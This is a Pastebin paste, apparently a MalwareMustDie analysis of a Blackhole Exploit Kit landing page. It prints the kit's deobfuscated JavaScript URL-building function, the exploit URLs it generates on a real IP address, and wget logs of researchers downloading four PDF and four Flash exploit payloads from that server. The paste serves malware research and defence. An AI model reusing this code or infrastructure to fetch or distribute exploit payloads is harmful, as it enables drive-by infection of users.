  908.  
  909. function x(s){
  910. d = [];
  911. for (i = 0; i < s.length; i ++ ){
  912. k = (s.charCodeAt(i)).toString(33);
  913. d.push(k);
  914. }
  915. ;
  916. return d.join(":");
  917. }
  918.  
  919. var domain="h00p://46.175.224.21:8080";
  920.  
  921. var url1 = domain + "/forum/links/public_version.php?jwio=" + x("244e0") + "&xnrj=" + x("nxjmw") + "&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
  922. var url2 = domain + "/forum/links/public_version.php?ecxrx=" + x("244e0") + "&pihpkcv=" + x("tlil") + "&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda";
  923. var url3 = domain + "/forum/links/public_version.php?jsehhtfz=" + x("c833f") + "&rrhjmwf=" + x("eomsp") + "&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms";
  924. var url4 = domain + "/forum/links/public_version.php?efoo=" + x("c833f") + "&bpsmrsqj=" + x("wdrh") + "&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx";
  925.  
  926. document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
  927.  
  928. // output
  929.  
  930. h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  931. h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  932. h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  933. h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
  934.  
  935. //=============LET's FLUSH THEM (4 PDF + 4 SWF) ALL!!! =============
  936.  
  937. //pdf
  938.  
  939. --2013-02-18 15:50:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  940. Connecting to 46.175.224.21:8080... connected.
  941. h00p request sent, awaiting response... 200 OK
  942. Length: 20161 (20K) [application/pdf]
  943. Saving to: `./pdf1.pdf'
  944. 100%[==============================================================================>] 20,161 32.3K/s in 0.6s
  945. 2013-02-18 15:50:24 (32.3 KB/s) - `./pdf1.pdf' saved [20161/20161]
  946.  
  947. --2013-02-18 15:50:53-- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  948. Connecting to 46.175.224.21:8080... connected.
  949. h00p request sent, awaiting response... 200 OK
  950. Length: 11194 (11K) [application/pdf]
  951. Saving to: `./pdf2.pdf'
  952. 100%[==============================================================================>] 11,194 32.5K/s in 0.3s
  953. 2013-02-18 15:50:54 (32.5 KB/s) - `./pdf2.pdf' saved [11194/11194]
  954.  
  955. --2013-02-18 15:51:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  956. Connecting to 46.175.224.21:8080... connected.
  957. h00p request sent, awaiting response... 200 OK
  958. Length: 20161 (20K) [application/pdf]
  959. Saving to: `./pdf3.pdf'
  960. 100%[==============================================================================>] 20,161 31.6K/s in 0.6s
  961. 2013-02-18 15:51:24 (31.6 KB/s) - `./pdf3.pdf' saved [20161/20161]
  962.  
  963. --2013-02-18 15:52:02-- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  964. Connecting to 46.175.224.21:8080... connected.
  965. h00p request sent, awaiting response... 200 OK
  966. Length: 11160 (11K) [application/pdf]
  967. Saving to: `./pdf4.pdf'
  968. 100%[==============================================================================>] 11,160 34.6K/s in 0.3s
  969. 2013-02-18 15:52:03 (34.6 KB/s) - `./pdf4.pdf' saved [11160/11160]
  970.  
  971.  
  972. // flash....
  973.  
  974.  
  975. --2013-02-18 15:54:34-- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  976. Connecting to 46.175.224.21:8080... connected.
  977. h00p request sent, awaiting response... 200 OK
  978. Length: 7981 (7.8K) [text/html]
  979. Saving to: `./flash1.swf'
  980. 100%[==============================================================================>] 7,981 26.7K/s in 0.3s
  981. 2013-02-18 15:54:36 (26.7 KB/s) - `./flash1.swf' saved [7981/7981]
  982.  
  983. --2013-02-18 15:54:58-- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  984. Connecting to 46.175.224.21:8080... connected.
  985. h00p request sent, awaiting response... 200 OK
  986. Length: 1030 (1.0K) [text/html]
  987. Saving to: `./flash2.swf'
  988. 100%[==============================================================================>] 1,030 --.-K/s in 0s
  989. 2013-02-18 15:54:59 (35.5 MB/s) - `./flash2.swf' saved [1030/1030]
  990.  
  991. --2013-02-18 15:55:14-- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  992. Connecting to 46.175.224.21:8080... connected.
  993. h00p request sent, awaiting response... 200 OK
  994. Length: 7981 (7.8K) [text/html]
  995. Saving to: `./flash3.swf'
  996. 100%[==============================================================================>] 7,981 25.5K/s in 0.3s
  997. 2013-02-18 15:55:15 (25.5 KB/s) - `./flash3.swf' saved [7981/7981]
  998.  
  999.  
  1000. --2013-02-18 15:57:54-- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
  1001. Connecting to 46.175.224.21:8080... connected.
  1002. h00p request sent, awaiting response... 200 OK
  1003. Length: 1030 (1.0K) [text/html]
  1004. Saving to: `./flash4.swf'
  1005. 100%[==============================================================================>] 1,030 --.-K/s in 0s
  1006. 2013-02-18 15:57:55 (36.2 MB/s) - `./flash4.swf' saved [1030/1030]
  1007.  
  1008.  
  1009. =========================
  1010.  
  1011. It has Geo-IP functions built in in BHEK...
  1012. Reference: http://ondailybasis.com/blog/?p=1483
  1013.  
  1014. =======================-
  1015.  
  1016. ----
  1017. #MalwareMustDie | @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!